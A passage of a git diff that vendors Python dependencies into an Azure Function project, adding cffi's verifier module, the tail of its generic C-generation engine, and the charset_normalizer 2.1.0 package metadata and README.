% ( + name, name, value)) + prnt(' char buf[64];') + prnt(' if ((%s) <= 0)' % name) + prnt(' sprintf(buf, "%%ld", (long)(%s));' % name) + prnt(' else') + prnt(' sprintf(buf, "%%lu", (unsigned long)(%s));' % + name) + prnt(' sprintf(out_error, "%s has the real value %s, not %s",') + prnt(' "%s", buf, "%d");' % (name[:100], value)) + prnt(' return -1;') + prnt(' }') + + def _load_known_int_constant(self, module, funcname): + BType = self.ffi._typeof_locked("char[]")[0] + BFunc = self.ffi._typeof_locked("int(*)(char*)")[0] + function = module.load_function(BFunc, funcname) + p = self.ffi.new(BType, 256) + if function(p) < 0: + error = self.ffi.string(p) + if sys.version_info >= (3,): + error = str(error, 'utf-8') + raise VerificationError(error) + + def _enum_funcname(self, prefix, name): + # "$enum_$1" => "___D_enum____D_1" + name = name.replace('$', '___D_') + return '_cffi_e_%s_%s' % (prefix, name) + + def _generate_gen_enum_decl(self, tp, name, prefix='enum'): + if tp.partial: + for enumerator in tp.enumerators: + self._generate_gen_const(True, enumerator) + return + # + funcname = self._enum_funcname(prefix, name) + self.export_symbols.append(funcname) + prnt = self._prnt + prnt('int %s(char *out_error)' % funcname) + prnt('{') + for enumerator, enumvalue in zip(tp.enumerators, tp.enumvalues): + self._check_int_constant_value(enumerator, enumvalue) + prnt(' return 0;') + prnt('}') + prnt() + + def _loading_gen_enum(self, tp, name, module, prefix='enum'): + if tp.partial: + enumvalues = [self._load_constant(True, tp, enumerator, module) + for enumerator in tp.enumerators] + tp.enumvalues = tuple(enumvalues) + tp.partial_resolved = True + else: + funcname = self._enum_funcname(prefix, name) + self._load_known_int_constant(module, funcname) + + def _loaded_gen_enum(self, tp, name, module, library): + for enumerator, enumvalue in zip(tp.enumerators, tp.enumvalues): + setattr(library, enumerator, enumvalue) + type(library)._cffi_dir.append(enumerator) + + # ---------- + # macros: for now only for integers + + def _generate_gen_macro_decl(self, tp, name): + if tp == '...': + check_value = None + else: + check_value = tp # an integer + self._generate_gen_const(True, name, check_value=check_value) + + _loading_gen_macro = _loaded_noop + + def _loaded_gen_macro(self, tp, name, module, library): + if tp == '...': + check_value = None + else: + check_value = tp # an integer + value = self._load_constant(True, tp, name, module, + check_value=check_value) + setattr(library, name, value) + type(library)._cffi_dir.append(name) + + # ---------- + # global variables + + def _generate_gen_variable_decl(self, tp, name): + if isinstance(tp, model.ArrayType): + if tp.length_is_unknown(): + prnt = self._prnt + funcname = '_cffi_sizeof_%s' % (name,) + self.export_symbols.append(funcname) + prnt("size_t %s(void)" % funcname) + prnt("{") + prnt(" return sizeof(%s);" % (name,)) + prnt("}") + tp_ptr = model.PointerType(tp.item) + self._generate_gen_const(False, name, tp_ptr) + else: + tp_ptr = model.PointerType(tp) + self._generate_gen_const(False, name, tp_ptr, category='var') + + _loading_gen_variable = _loaded_noop + + def _loaded_gen_variable(self, tp, name, module, library): + if isinstance(tp, model.ArrayType): # int a[5] is "constant" in the + # sense that "a=..." is forbidden + if tp.length_is_unknown(): + funcname = '_cffi_sizeof_%s' % (name,) + BFunc = self.ffi._typeof_locked('size_t(*)(void)')[0] + function = module.load_function(BFunc, funcname) + size = function() + BItemType = self.ffi._get_cached_btype(tp.item) + length, rest = divmod(size, self.ffi.sizeof(BItemType)) + if rest != 0: + raise VerificationError( + "bad size: %r does not seem to be an array of %s" % + (name, tp.item)) + tp = tp.resolve_length(length) + tp_ptr = model.PointerType(tp.item) + value = self._load_constant(False, tp_ptr, name, module) + # 'value' is a which we have to replace with + # a if the N is actually known + if tp.length is not None: + BArray = self.ffi._get_cached_btype(tp) + value = self.ffi.cast(BArray, value) + setattr(library, name, value) + type(library)._cffi_dir.append(name) + return + # remove ptr= from the library instance, and replace + # it by a property on the class, which reads/writes into ptr[0]. + funcname = '_cffi_var_%s' % name + BFunc = self.ffi._typeof_locked(tp.get_c_name('*(*)(void)', name))[0] + function = module.load_function(BFunc, funcname) + ptr = function() + def getter(library): + return ptr[0] + def setter(library, value): + ptr[0] = value + setattr(type(library), name, property(getter, setter)) + type(library)._cffi_dir.append(name) + +cffimod_header = r''' +#include +#include +#include +#include +#include /* XXX for ssize_t on some platforms */ + +/* this block of #ifs should be kept exactly identical between + c/_cffi_backend.c, cffi/vengine_cpy.py, cffi/vengine_gen.py + and cffi/_cffi_include.h */ +#if defined(_MSC_VER) +# include /* for alloca() */ +# if _MSC_VER < 1600 /* MSVC < 2010 */ + typedef __int8 int8_t; + typedef __int16 int16_t; + typedef __int32 int32_t; + typedef __int64 int64_t; + typedef unsigned __int8 uint8_t; + typedef unsigned __int16 uint16_t; + typedef unsigned __int32 uint32_t; + typedef unsigned __int64 uint64_t; + typedef __int8 int_least8_t; + typedef __int16 int_least16_t; + typedef __int32 int_least32_t; + typedef __int64 int_least64_t; + typedef unsigned __int8 uint_least8_t; + typedef unsigned __int16 uint_least16_t; + typedef unsigned __int32 uint_least32_t; + typedef unsigned __int64 uint_least64_t; + typedef __int8 int_fast8_t; + typedef __int16 int_fast16_t; + typedef __int32 int_fast32_t; + typedef __int64 int_fast64_t; + typedef unsigned __int8 uint_fast8_t; + typedef unsigned __int16 uint_fast16_t; + typedef unsigned __int32 uint_fast32_t; + typedef unsigned __int64 uint_fast64_t; + typedef __int64 intmax_t; + typedef unsigned __int64 uintmax_t; +# else +# include +# endif +# if _MSC_VER < 1800 /* MSVC < 2013 */ +# ifndef __cplusplus + typedef unsigned char _Bool; +# endif +# endif +#else +# include +# if (defined (__SVR4) && defined (__sun)) || defined(_AIX) || defined(__hpux) +# include +# endif +#endif +''' diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/verifier.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/verifier.py new file mode 100644 index 0000000..9fbfef2 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/verifier.py @@ -0,0 +1,307 @@ +# +# DEPRECATED: implementation for ffi.verify() +# +import sys, os, binascii, shutil, io +from . import __version_verifier_modules__ +from . import ffiplatform +from .error import VerificationError + +if sys.version_info >= (3, 3): + import importlib.machinery + def _extension_suffixes(): + return importlib.machinery.EXTENSION_SUFFIXES[:] +else: + import imp + def _extension_suffixes(): + return [suffix for suffix, _, type in imp.get_suffixes() + if type == imp.C_EXTENSION] + + +if sys.version_info >= (3,): + NativeIO = io.StringIO +else: + class NativeIO(io.BytesIO): + def write(self, s): + if isinstance(s, unicode): + s = s.encode('ascii') + super(NativeIO, self).write(s) + + +class Verifier(object): + + def __init__(self, ffi, preamble, tmpdir=None, modulename=None, + ext_package=None, tag='', force_generic_engine=False, + source_extension='.c', flags=None, relative_to=None, **kwds): + if ffi._parser._uses_new_feature: + raise VerificationError( + "feature not supported with ffi.verify(), but only " + "with ffi.set_source(): %s" % (ffi._parser._uses_new_feature,)) + self.ffi = ffi + self.preamble = preamble + if not modulename: + flattened_kwds = ffiplatform.flatten(kwds) + vengine_class = _locate_engine_class(ffi, force_generic_engine) + self._vengine = vengine_class(self) + self._vengine.patch_extension_kwds(kwds) + self.flags = flags + self.kwds = self.make_relative_to(kwds, relative_to) + # + if modulename: + if tag: + raise TypeError("can't specify both 'modulename' and 'tag'") + else: + key = '\x00'.join(['%d.%d' % sys.version_info[:2], + __version_verifier_modules__, + preamble, flattened_kwds] + + ffi._cdefsources) + if sys.version_info >= (3,): + key = key.encode('utf-8') + k1 = hex(binascii.crc32(key[0::2]) & 0xffffffff) + k1 = k1.lstrip('0x').rstrip('L') + k2 = hex(binascii.crc32(key[1::2]) & 0xffffffff) + k2 = k2.lstrip('0').rstrip('L') + modulename = '_cffi_%s_%s%s%s' % (tag, self._vengine._class_key, + k1, k2) + suffix = _get_so_suffixes()[0] + self.tmpdir = tmpdir or _caller_dir_pycache() + self.sourcefilename = os.path.join(self.tmpdir, modulename + source_extension) + self.modulefilename = os.path.join(self.tmpdir, modulename + suffix) + self.ext_package = ext_package + self._has_source = False + self._has_module = False + + def write_source(self, file=None): + """Write the C source code. It is produced in 'self.sourcefilename', + which can be tweaked beforehand.""" + with self.ffi._lock: + if self._has_source and file is None: + raise VerificationError( + "source code already written") + self._write_source(file) + + def compile_module(self): + """Write the C source code (if not done already) and compile it. + This produces a dynamic link library in 'self.modulefilename'.""" + with self.ffi._lock: + if self._has_module: + raise VerificationError("module already compiled") + if not self._has_source: + self._write_source() + self._compile_module() + + def load_library(self): + """Get a C module from this Verifier instance. + Returns an instance of a FFILibrary class that behaves like the + objects returned by ffi.dlopen(), but that delegates all + operations to the C module. If necessary, the C code is written + and compiled first. + """ + with self.ffi._lock: + if not self._has_module: + self._locate_module() + if not self._has_module: + if not self._has_source: + self._write_source() + self._compile_module() + return self._load_library() + + def get_module_name(self): + basename = os.path.basename(self.modulefilename) + # kill both the .so extension and the other .'s, as introduced + # by Python 3: 'basename.cpython-33m.so' + basename = basename.split('.', 1)[0] + # and the _d added in Python 2 debug builds --- but try to be + # conservative and not kill a legitimate _d + if basename.endswith('_d') and hasattr(sys, 'gettotalrefcount'): + basename = basename[:-2] + return basename + + def get_extension(self): + ffiplatform._hack_at_distutils() # backward compatibility hack + if not self._has_source: + with self.ffi._lock: + if not self._has_source: + self._write_source() + sourcename = ffiplatform.maybe_relative_path(self.sourcefilename) + modname = self.get_module_name() + return ffiplatform.get_extension(sourcename, modname, **self.kwds) + + def generates_python_module(self): + return self._vengine._gen_python_module + + def make_relative_to(self, kwds, relative_to): + if relative_to and os.path.dirname(relative_to): + dirname = os.path.dirname(relative_to) + kwds = kwds.copy() + for key in ffiplatform.LIST_OF_FILE_NAMES: + if key in kwds: + lst = kwds[key] + if not isinstance(lst, (list, tuple)): + raise TypeError("keyword '%s' should be a list or tuple" + % (key,)) + lst = [os.path.join(dirname, fn) for fn in lst] + kwds[key] = lst + return kwds + + # ---------- + + def _locate_module(self): + if not os.path.isfile(self.modulefilename): + if self.ext_package: + try: + pkg = __import__(self.ext_package, None, None, ['__doc__']) + except ImportError: + return # cannot import the package itself, give up + # (e.g. it might be called differently before installation) + path = pkg.__path__ + else: + path = None + filename = self._vengine.find_module(self.get_module_name(), path, + _get_so_suffixes()) + if filename is None: + return + self.modulefilename = filename + self._vengine.collect_types() + self._has_module = True + + def _write_source_to(self, file): + self._vengine._f = file + try: + self._vengine.write_source_to_f() + finally: + del self._vengine._f + + def _write_source(self, file=None): + if file is not None: + self._write_source_to(file) + else: + # Write our source file to an in memory file. + f = NativeIO() + self._write_source_to(f) + source_data = f.getvalue() + + # Determine if this matches the current file + if os.path.exists(self.sourcefilename): + with open(self.sourcefilename, "r") as fp: + needs_written = not (fp.read() == source_data) + else: + needs_written = True + + # Actually write the file out if it doesn't match + if needs_written: + _ensure_dir(self.sourcefilename) + with open(self.sourcefilename, "w") as fp: + fp.write(source_data) + + # Set this flag + self._has_source = True + + def _compile_module(self): + # compile this C source + tmpdir = os.path.dirname(self.sourcefilename) + outputfilename = ffiplatform.compile(tmpdir, self.get_extension()) + try: + same = ffiplatform.samefile(outputfilename, self.modulefilename) + except OSError: + same = False + if not same: + _ensure_dir(self.modulefilename) + shutil.move(outputfilename, self.modulefilename) + self._has_module = True + + def _load_library(self): + assert self._has_module + if self.flags is not None: + return self._vengine.load_library(self.flags) + else: + return self._vengine.load_library() + +# ____________________________________________________________ + +_FORCE_GENERIC_ENGINE = False # for tests + +def _locate_engine_class(ffi, force_generic_engine): + if _FORCE_GENERIC_ENGINE: + force_generic_engine = True + if not force_generic_engine: + if '__pypy__' in sys.builtin_module_names: + force_generic_engine = True + else: + try: + import _cffi_backend + except ImportError: + _cffi_backend = '?' + if ffi._backend is not _cffi_backend: + force_generic_engine = True + if force_generic_engine: + from . import vengine_gen + return vengine_gen.VGenericEngine + else: + from . import vengine_cpy + return vengine_cpy.VCPythonEngine + +# ____________________________________________________________ + +_TMPDIR = None + +def _caller_dir_pycache(): + if _TMPDIR: + return _TMPDIR + result = os.environ.get('CFFI_TMPDIR') + if result: + return result + filename = sys._getframe(2).f_code.co_filename + return os.path.abspath(os.path.join(os.path.dirname(filename), + '__pycache__')) + +def set_tmpdir(dirname): + """Set the temporary directory to use instead of __pycache__.""" + global _TMPDIR + _TMPDIR = dirname + +def cleanup_tmpdir(tmpdir=None, keep_so=False): + """Clean up the temporary directory by removing all files in it + called `_cffi_*.{c,so}` as well as the `build` subdirectory.""" + tmpdir = tmpdir or _caller_dir_pycache() + try: + filelist = os.listdir(tmpdir) + except OSError: + return + if keep_so: + suffix = '.c' # only remove .c files + else: + suffix = _get_so_suffixes()[0].lower() + for fn in filelist: + if fn.lower().startswith('_cffi_') and ( + fn.lower().endswith(suffix) or fn.lower().endswith('.c')): + try: + os.unlink(os.path.join(tmpdir, fn)) + except OSError: + pass + clean_dir = [os.path.join(tmpdir, 'build')] + for dir in clean_dir: + try: + for fn in os.listdir(dir): + fn = os.path.join(dir, fn) + if os.path.isdir(fn): + clean_dir.append(fn) + else: + os.unlink(fn) + except OSError: + pass + +def _get_so_suffixes(): + suffixes = _extension_suffixes() + if not suffixes: + # bah, no C_EXTENSION available. Occurs on pypy without cpyext + if sys.platform == 'win32': + suffixes = [".pyd"] + else: + suffixes = [".so"] + + return suffixes + +def _ensure_dir(filename): + dirname = os.path.dirname(filename) + if dirname and not os.path.isdir(dirname): + os.makedirs(dirname) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer-2.1.0.dist-info/INSTALLER b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer-2.1.0.dist-info/INSTALLER new file mode 100644 index 0000000..4660be2 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer-2.1.0.dist-info/INSTALLER @@ -0,0 +1 @@ +pip diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer-2.1.0.dist-info/LICENSE b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer-2.1.0.dist-info/LICENSE new file mode 100644 index 0000000..6da2297 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer-2.1.0.dist-info/LICENSE @@ -0,0 +1,21 @@ +MIT License + +Copyright (c) 2019 TAHRI Ahmed R. + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. \ No newline at end of file diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer-2.1.0.dist-info/METADATA b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer-2.1.0.dist-info/METADATA new file mode 100644 index 0000000..e6e87cf --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer-2.1.0.dist-info/METADATA @@ -0,0 +1,269 @@ +Metadata-Version: 2.1 +Name: charset-normalizer +Version: 2.1.0 +Summary: The Real First Universal Charset Detector. Open, modern and actively maintained alternative to Chardet. +Home-page: https://github.com/ousret/charset_normalizer +Author: Ahmed TAHRI @Ousret +Author-email: ahmed.tahri@cloudnursery.dev +License: MIT +Project-URL: Bug Reports, https://github.com/Ousret/charset_normalizer/issues +Project-URL: Documentation, https://charset-normalizer.readthedocs.io/en/latest +Keywords: encoding,i18n,txt,text,charset,charset-detector,normalization,unicode,chardet +Platform: UNKNOWN +Classifier: Development Status :: 5 - Production/Stable +Classifier: License :: OSI Approved :: MIT License +Classifier: Intended Audience :: Developers +Classifier: Topic :: Software Development :: Libraries :: Python Modules +Classifier: Operating System :: OS Independent +Classifier: Programming Language :: Python +Classifier: Programming Language :: Python :: 3 +Classifier: Programming Language :: Python :: 3.6 +Classifier: Programming Language :: Python :: 3.7 +Classifier: Programming Language :: Python :: 3.8 +Classifier: Programming Language :: Python :: 3.9 +Classifier: Programming Language :: Python :: 3.10 +Classifier: Programming Language :: Python :: 3.11 +Classifier: Topic :: Text Processing :: Linguistic +Classifier: Topic :: Utilities +Classifier: Programming Language :: Python :: Implementation :: PyPy +Classifier: Typing :: Typed +Requires-Python: >=3.6.0 +Description-Content-Type: text/markdown +License-File: LICENSE +Provides-Extra: unicode_backport +Requires-Dist: unicodedata2 ; extra == 'unicode_backport' + + +

Charset Detection, for Everyone 👋

+ +

+ The Real First Universal Charset Detector
+ + + + + + + + Download Count Total + +

+ +> A library that helps you read text from an unknown charset encoding.
Motivated by `chardet`, +> I'm trying to resolve the issue by taking a new approach. +> All IANA character set names for which the Python core library provides codecs are supported. + +

+ >>>>> 👉 Try Me Online Now, Then Adopt Me 👈 <<<<< +

+ +This project offers you an alternative to **Universal Charset Encoding Detector**, also known as **Chardet**. + +| Feature | [Chardet](https://github.com/chardet/chardet) | Charset Normalizer | [cChardet](https://github.com/PyYoshi/cChardet) | +| ------------- | :-------------: | :------------------: | :------------------: | +| `Fast` | ❌
| ✅
| ✅
| +| `Universal**` | ❌ | ✅ | ❌ | +| `Reliable` **without** distinguishable standards | ❌ | ✅ | ✅ | +| `Reliable` **with** distinguishable standards | ✅ | ✅ | ✅ | +| `Free & Open` | ✅ | ✅ | ✅ | +| `License` | LGPL-2.1 | MIT | MPL-1.1 +| `Native Python` | ✅ | ✅ | ❌ | +| `Detect spoken language` | ❌ | ✅ | N/A | +| `Supported Encoding` | 30 | :tada: [93](https://charset-normalizer.readthedocs.io/en/latest/user/support.html#supported-encodings) | 40 + +

+Reading Normalized TextCat Reading Text + +*\*\* : They are clearly using specific code for a specific encoding even if covering most of used one*
+Did you got there because of the logs? See [https://charset-normalizer.readthedocs.io/en/latest/user/miscellaneous.html](https://charset-normalizer.readthedocs.io/en/latest/user/miscellaneous.html) + +## ⭐ Your support + +*Fork, test-it, star-it, submit your ideas! We do listen.* + +## ⚡ Performance + +This package offer better performance than its counterpart Chardet. Here are some numbers. + +| Package | Accuracy | Mean per file (ms) | File per sec (est) | +| ------------- | :-------------: | :------------------: | :------------------: | +| [chardet](https://github.com/chardet/chardet) | 92 % | 200 ms | 5 file/sec | +| charset-normalizer | **98 %** | **39 ms** | 26 file/sec | + +| Package | 99th percentile | 95th percentile | 50th percentile | +| ------------- | :-------------: | :------------------: | :------------------: | +| [chardet](https://github.com/chardet/chardet) | 1200 ms | 287 ms | 23 ms | +| charset-normalizer | 400 ms | 200 ms | 15 ms | + +Chardet's performance on larger file (1MB+) are very poor. Expect huge difference on large payload. + +> Stats are generated using 400+ files using default parameters. More details on used files, see GHA workflows. +> And yes, these results might change at any time. The dataset can be updated to include more files. +> The actual delays heavily depends on your CPU capabilities. The factors should remain the same. + +[cchardet](https://github.com/PyYoshi/cChardet) is a non-native (cpp binding) and unmaintained faster alternative with +a better accuracy than chardet but lower than this package. If speed is the most important factor, you should try it. + +## ✨ Installation + +Using PyPi for latest stable +```sh +pip install charset-normalizer -U +``` + +If you want a more up-to-date `unicodedata` than the one available in your Python setup. +```sh +pip install charset-normalizer[unicode_backport] -U +``` + +## 🚀 Basic Usage + +### CLI +This package comes with a CLI. + +``` +usage: normalizer [-h] [-v] [-a] [-n] [-m] [-r] [-f] [-t THRESHOLD] + file [file ...] + +The Real First Universal Charset Detector. Discover originating encoding used +on text file. Normalize text to unicode. + +positional arguments: + files File(s) to be analysed + +optional arguments: + -h, --help show this help message and exit + -v, --verbose Display complementary information about file if any. + Stdout will contain logs about the detection process. + -a, --with-alternative + Output complementary possibilities if any. Top-level + JSON WILL be a list. + -n, --normalize Permit to normalize input file. If not set, program + does not write anything. + -m, --minimal Only output the charset detected to STDOUT. Disabling + JSON output. + -r, --replace Replace file when trying to normalize it instead of + creating a new one. + -f, --force Replace file without asking if you are sure, use this + flag with caution. + -t THRESHOLD, --threshold THRESHOLD + Define a custom maximum amount of chaos allowed in + decoded content. 0. <= chaos <= 1. + --version Show version information and exit. +``` + +```bash +normalizer ./data/sample.1.fr.srt +``` + +:tada: Since version 1.4.0 the CLI produce easily usable stdout result in JSON format. + +```json +{ + "path": "/home/default/projects/charset_normalizer/data/sample.1.fr.srt", + "encoding": "cp1252", + "encoding_aliases": [ + "1252", + "windows_1252" + ], + "alternative_encodings": [ + "cp1254", + "cp1256", + "cp1258", + "iso8859_14", + "iso8859_15", + "iso8859_16", + "iso8859_3", + "iso8859_9", + "latin_1", + "mbcs" + ], + "language": "French", + "alphabets": [ + "Basic Latin", + "Latin-1 Supplement" + ], + "has_sig_or_bom": false, + "chaos": 0.149, + "coherence": 97.152, + "unicode_path": null, + "is_preferred": true +} +``` + +### Python +*Just print out normalized text* +```python +from charset_normalizer import from_path + +results = from_path('./my_subtitle.srt') + +print(str(results.best())) +``` + +*Normalize any text file* +```python +from charset_normalizer import normalize +try: + normalize('./my_subtitle.srt') # should write to disk my_subtitle-***.srt +except IOError as e: + print('Sadly, we are unable to perform charset normalization.', str(e)) +``` + +*Upgrade your code without effort* +```python +from charset_normalizer import detect +``` + +The above code will behave the same as **chardet**. We ensure that we offer the best (reasonable) BC result possible. + +See the docs for advanced usage : [readthedocs.io](https://charset-normalizer.readthedocs.io/en/latest/) + +## 😇 Why + +When I started using Chardet, I noticed that it was not suited to my expectations, and I wanted to propose a +reliable alternative using a completely different method. Also! I never back down on a good challenge! + +I **don't care** about the **originating charset** encoding, because **two different tables** can +produce **two identical rendered string.** +What I want is to get readable text, the best I can. + +In a way, **I'm brute forcing text decoding.** How cool is that ? 😎 + +Don't confuse package **ftfy** with charset-normalizer or chardet. ftfy goal is to repair unicode string whereas charset-normalizer to convert raw file in unknown encoding to unicode. + +## 🍰 How + + - Discard all charset encoding table that could not fit the binary content. + - Measure chaos, or the mess once opened (by chunks) with a corresponding charset encoding. + - Extract matches with the lowest mess detected. + - Additionally, we measure coherence / probe for a language. + +**Wait a minute**, what is chaos/mess and coherence according to **YOU ?** + +*Chaos :* I opened hundred of text files, **written by humans**, with the wrong encoding table. **I observed**, then +**I established** some ground rules about **what is obvious** when **it seems like** a mess. + I know that my interpretation of what is chaotic is very subjective, feel free to contribute in order to + improve or rewrite it. + +*Coherence :* For each language there is on earth, we have computed ranked letter appearance occurrences (the best we can). So I thought +that intel is worth something here. So I use those records against decoded text to check if I can detect intelligent design. + +## ⚡ Known limitations + + - Language detection is unreliable when text contains two or more languages sharing identical letters. (eg. HTML (english tags) + Turkish content (Sharing Latin characters)) + - Every charset detector heavily depends on sufficient content. In common cases, do not bother run detection on very tiny content. + +## 👤 Contributing + +Contributions, issues and feature requests are very much welcome.
+Feel free to check [issues page](https://github.com/ousret/charset_normalizer/issues) if you want to contribute. + +## 📝 License + +Copyright © 2019 [Ahmed TAHRI @Ousret](https://github.com/Ousret).
+This project is [MIT](https://github.com/Ousret/charset_normalizer/blob/master/LICENSE) licensed. + +Characters frequencies used in this project © 2012 [Denny Vrandečić](http://simia.net/letters/) + + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer-2.1.0.dist-info/RECORD b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer-2.1.0.dist-info/RECORD new file mode 100644 index 0000000..4bb3a80 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer-2.1.0.dist-info/RECORD @@ -0,0 +1,33 @@ +../../bin/normalizer,sha256=_6VNRnw7MyVCL-CINQ044FaHcpLHwQVgd-_D0cWq4KI,244 +charset_normalizer-2.1.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4 +charset_normalizer-2.1.0.dist-info/LICENSE,sha256=6zGgxaT7Cbik4yBV0lweX5w1iidS_vPNcgIT0cz-4kE,1070 +charset_normalizer-2.1.0.dist-info/METADATA,sha256=PqR4yIS_Cr-NWPWOpEKrGzb8HltKDlD8-vXz-cMTaog,11718 +charset_normalizer-2.1.0.dist-info/RECORD,, +charset_normalizer-2.1.0.dist-info/WHEEL,sha256=G16H4A3IeoQmnOrYV4ueZGKSjhipXx8zc8nu9FGlvMA,92 +charset_normalizer-2.1.0.dist-info/entry_points.txt,sha256=5AJq_EPtGGUwJPgQLnBZfbVr-FYCIwT0xP7dIEZO3NI,77 +charset_normalizer-2.1.0.dist-info/top_level.txt,sha256=7ASyzePr8_xuZWJsnqJjIBtyV8vhEo0wBCv1MPRRi3Q,19 +charset_normalizer/__init__.py,sha256=x2A2OW29MBcqdxsvy6t1wzkUlH3ma0guxL6ZCfS8J94,1790 +charset_normalizer/__pycache__/__init__.cpython-39.pyc,, +charset_normalizer/__pycache__/api.cpython-39.pyc,, +charset_normalizer/__pycache__/cd.cpython-39.pyc,, +charset_normalizer/__pycache__/constant.cpython-39.pyc,, +charset_normalizer/__pycache__/legacy.cpython-39.pyc,, +charset_normalizer/__pycache__/md.cpython-39.pyc,, +charset_normalizer/__pycache__/models.cpython-39.pyc,, +charset_normalizer/__pycache__/utils.cpython-39.pyc,, +charset_normalizer/__pycache__/version.cpython-39.pyc,, +charset_normalizer/api.py,sha256=LwJ32ZBLv79ehfWN8nss7F--QkssNQIOQyjD1_t9a70,18960 +charset_normalizer/assets/__init__.py,sha256=ZXzdy-3PHtCldBTF-3tDI9qERLKp9AN-yt-sB6fIMFs,15222 +charset_normalizer/assets/__pycache__/__init__.cpython-39.pyc,, +charset_normalizer/cd.py,sha256=gUwdMn2Du-u31I4VlmGK2C5x1z_V6vhqFfEIp9w1uE0,10780 +charset_normalizer/cli/__init__.py,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 +charset_normalizer/cli/__pycache__/__init__.cpython-39.pyc,, +charset_normalizer/cli/__pycache__/normalizer.cpython-39.pyc,, +charset_normalizer/cli/normalizer.py,sha256=NmT5GSdXx0UJFxZaSp_DjPudcwc7JTB-MY3rfemgTpY,9501 +charset_normalizer/constant.py,sha256=NgU-pY8JH2a9lkVT8oKwAFmIUYNKOuSBwZgF9MrlNCM,19157 +charset_normalizer/legacy.py,sha256=XKeZOts_HdYQU_Jb3C9ZfOjY2CiUL132k9_nXer8gig,3384 +charset_normalizer/md.py,sha256=pZP8IVpSC82D8INA9Tf_y0ijJSRI-UIncZvLdfTWEd4,17642 +charset_normalizer/models.py,sha256=WkEr3Zr4m8VBxp3_2hMXhFFvRWDqoLDXKRDtAqBKMQg,13087 +charset_normalizer/py.typed,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 +charset_normalizer/utils.py,sha256=Z-VtLSynph2jMGpzZ5rgx21RM_4ALVpT63B5lQ7xreY,11726 +charset_normalizer/version.py,sha256=aHhGbxCxD3_nEElAoNbMRqmGpyqLWCYkGvbAEHl34rM,79 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer-2.1.0.dist-info/WHEEL b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer-2.1.0.dist-info/WHEEL new file mode 100644 index 0000000..153494e --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer-2.1.0.dist-info/WHEEL @@ -0,0 +1,5 @@ +Wheel-Version: 1.0 +Generator: bdist_wheel (0.37.1) +Root-Is-Purelib: true +Tag: py3-none-any + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer-2.1.0.dist-info/entry_points.txt b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer-2.1.0.dist-info/entry_points.txt new file mode 100644 index 0000000..87597a1 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer-2.1.0.dist-info/entry_points.txt @@ -0,0 +1,3 @@ +[console_scripts] +normalizer = charset_normalizer.cli.normalizer:cli_detect + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer-2.1.0.dist-info/top_level.txt b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer-2.1.0.dist-info/top_level.txt new file mode 100644 index 0000000..b7e94c9 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer-2.1.0.dist-info/top_level.txt @@ -0,0 +1 @@ +charset_normalizer diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/__init__.py new file mode 100644 index 0000000..d9a6d71 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/__init__.py @@ -0,0 +1,56 @@ +# -*- coding: utf_8 -*- +""" +Charset-Normalizer +~~~~~~~~~~~~~~ +The Real First Universal Charset Detector. +A library that helps you read text from an unknown charset encoding. +Motivated by chardet, This package is trying to resolve the issue by taking a new approach. +All IANA character set names for which the Python core library provides codecs are supported. + +Basic usage: + >>> from charset_normalizer import from_bytes + >>> results = from_bytes('Bсеки човек има право на образование. 